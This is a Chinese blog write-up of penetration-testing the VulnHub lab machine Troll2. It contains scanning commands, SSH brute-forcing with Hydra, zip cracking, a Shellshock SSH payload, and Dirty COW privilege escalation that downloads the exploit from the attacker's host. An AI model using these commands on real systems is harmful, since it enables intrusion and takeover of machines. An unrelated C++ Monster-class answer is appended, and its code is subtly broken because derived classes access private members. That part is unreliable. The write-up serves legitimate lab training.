Troll2打靶思路详解(vulnhub)

本文详细描述了在Troll2虚拟机中进行渗透测试的过程,包括信息收集、端口扫描、web服务和ftp/ssh服务的探索,以及利用shellshock漏洞进行提权的方法。
摘要由CSDN通过智能技术生成

Troll2打靶思路详解(vulnhub)

第一步:信息收集–主机发现和端口扫描

使用nmap快速对局域网进行扫描来确定靶机IP

nmap -sn 192.168.31.0/24 

确定靶机IP为192.168.31.72

再次使用nmap对靶机IP进行详细扫描

nmap -p- -sV -sT -O 192.168.31.72

结果如下

在这里插入图片描述

首先对80端口所开放的web服务进行信息收集

查看web服务访问http://192.168.31.72/

!在这里插入图片描述

还是熟悉的图片…

通过dirb进行目录扫描

dirb http://192.168.31.72/ 

结果如下

在这里插入图片描述

访问http://192.168.31.72/robots.txt

在这里插入图片描述

我的天呐,这么多那就把robots.txt下载下来

wget http://192.168.31.72/robots.txt 

通过python脚本批量查看一下那些网址可以访问

在这里插入图片描述

可以看到 /noob /keep_trying /dont_bother /ok_this_is_it 这几个网址可以访问,那就用浏览器查看一下,发现都是以下这个图片

在这里插入图片描述

完了,又被狗作者嘲讽了

然后对21端口所开放的ftp服务进行信息收集

通过ftp 192.168.31.72命令来访问

有了上一个靶机的经验,我尝试anonymous(匿名用户)进行登入,发现根本不行

在这里插入图片描述

最后对22端口所开放的ssh服务进行信息收集

还是尝试用Hydra进行弱口令爆破

hydra -L user.txt -P CommonWebAdminPass.txt -t 2 -vV -e ns 192.168.31.69 ssh

并没有什么发现

第二步:猜测与破解

进行到这里我的思路已经断了

我重新开始查看收集到的信息

在尝试连接ftp的返回信息中

220 Welcome to Tr0ll FTP... Only noobs stay for a while...

发现这里是“Tr0ll”,而不是”Troll"。我承认这里有些运气的存在

但是他ftp的账号和密码都是Tr0ll

所以接下来就是登入,查看,下载

在这里插入图片描述

发现是zip文件,解压一下

在这里插入图片描述

你妹的,有密码

第三步:WEB到杂项

已经进行到现在这个地步了,web上还是没有什么收获,我尝试用更大的字典进行扫描,还是没有结果,突然间想到有没有可能藏在图片里了,说干就干

下载

wget http://192.168.31.72/tr0ll_again.jpg

wget http://192.168.31.72/noob/cat_the_troll.jpg

wget http://192.168.31.72/keep_trying/cat_the_troll.jpg

wget http://192.168.31.72/dont_bother/cat_the_troll.jpg

wget http://192.168.31.72/ok_this_is_it/cat_the_troll.jpg

查看

strings tr0ll_again.jpg

strings cat_the_troll.jpg

最后在“http://192.168.31.72/dont_bother/cat_the_troll.jpg”这个图片里发现了以下信息

在这里插入图片描述

Look Deep within y0ur_self for the answer

翻译:
在y0ur_self深处寻找答案

所以访问

在这里插入图片描述

将answer.txt下载下来

wget http://192.168.31.72/y0ur_self/answer.txt

第四步:ZIP爆破

查看

在这里插入图片描述

看一下格式几乎可以确定是用base64算法加密的

那就解密

base64 -d answer.txt > password.txt

然后使用fcrackzip暴力破解

fcrackzip -u -D -p password.txt lmao.zip

在这里插入图片描述

得到了密码”ItCantReallyBeThisEasyRightLOL“,解压并查看zip文件

在这里插入图片描述

发现是ssh的key文件!这可太棒了!!!

第五步:后渗透–SSH登入与提权

ssh登入

ssh -i noob noob@192.168.31.72

在这里插入图片描述

发现报了个错误,我查询资料发现是SHA-1算法不安全,新版本的openssh已经禁用了,临时解决方法加上-o PubkeyAcceptedKeyTypes=+ssh-rsa参数。

所以使用以下命令连接

ssh -i noob noob@192.168.31.72 -o PubkeyAcceptedKeyTypes=+ssh-rsa  

在这里插入图片描述

狗作者告诉我

TRY HARDER LOL!

翻译:
更努力,哈哈

经过查询资料发现可以通过利用shellshock漏洞来获取会话

(shellshock漏洞原理较为复杂,感兴趣的同学可以去看看)

所以playload如下

ssh -i noob noob@192.168.31.72 -o PubkeyAcceptedKeyTypes=+ssh-rsa '() { :;}; /bin/bash'

然后还是通过python来增加shell的交互性

python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述

提权

查看当前用户权限

id

sudo -l

在这里插入图片描述

可以看出只是普通用户的权限

直接查看内核和gcc版本,看看能不能使用脏牛进行提权

脏牛链接https://github.com/FireFart/dirtycow

在这里插入图片描述

感觉差不多,那就冲

本地python启动http服务

在这里插入图片描述

使用wget命令下载靶机

wget http://192.168.31.213:8000/dirty.c

编译,执行

gcc -pthread dirty.c -o dirty -lcrypt

./dirty my-new-password

在这里插入图片描述

成功了,登入firefart用户,恢复“/etc/passwd!”

su firefart

mv /tmp/passwd.bak /etc/passwd

看一下权限

id

在这里插入图片描述

可以看到已经是root权限了

最后就是拿flag了

在这里插入图片描述

至此完结,撒花。

  • 38
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
好的,根据你的要求,我来为你实现怪物类Monster。 首先,我们可以定义一个Monster类,包含hitpoint、damage、defense和attack等成员变量和函数。其中,attack函数可以用虚函数来定义,以便在派生类中实现不同的攻击方式。 ```c++ class Monster { public: Monster(int hp, int dmg, int def) : hitpoint(hp), damage(dmg), defense(def) {} virtual void attack(Monster& enemy) {} void fight(Monster& enemy) { while (hitpoint > 0 && enemy.hitpoint > 0) { attack(enemy); if (enemy.hitpoint <= 0) break; enemy.attack(*this); } } private: int hitpoint; int damage; int defense; }; ``` 在这里,我们定义了一个Monster类,它有三个私有成员变量:hitpoint、damage和defense,表示怪物的生命值、攻击力和防御力。另外,我们定义了一个不带virtual修饰的成员函数fight,用来描述与另一个怪物进行战斗的过程。在fight函数中,我们通过调用attack函数来模拟战斗,直到其中一个怪物的生命值降为0。 接下来,我们可以派生出一些具体的怪物类,并实现它们的攻击方式,例如: ```c++ class Goblin : public Monster { public: Goblin() : Monster(50, 10, 5) {} void attack(Monster& enemy) { int damage = this->damage - enemy.defense; if (damage > 0) { enemy.hitpoint -= damage; } } }; class Troll : public Monster { public: Troll() : Monster(100, 20, 10) {} void attack(Monster& enemy) { int damage = this->damage - enemy.defense; if (damage > 0) { enemy.hitpoint -= damage; this->hitpoint += damage / 2; // Troll can heal itself } } }; ``` 在这里,我们派生出了Goblin和Troll两个具体的怪物类,并实现了它们各自的攻击方式。Goblin的攻击方式是直接减去敌人的防御力,并造成相应的伤害;而Troll的攻击方式除了减去敌人的防御力外,还会使自己恢复一部分生命值。 最后,我们可以使用这些怪物类来进行战斗,例如: ```c++ int main() { Goblin goblin; Troll troll; goblin.fight(troll); return 0; } ``` 在这个例子中,我们创建了一个Goblin对象和一个Troll对象,并让它们进行战斗。由于我们在Monster类中定义了通用的战斗方式,因此我们可以直接调用fight函数进行战斗,而不用考虑具体的攻击方式。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值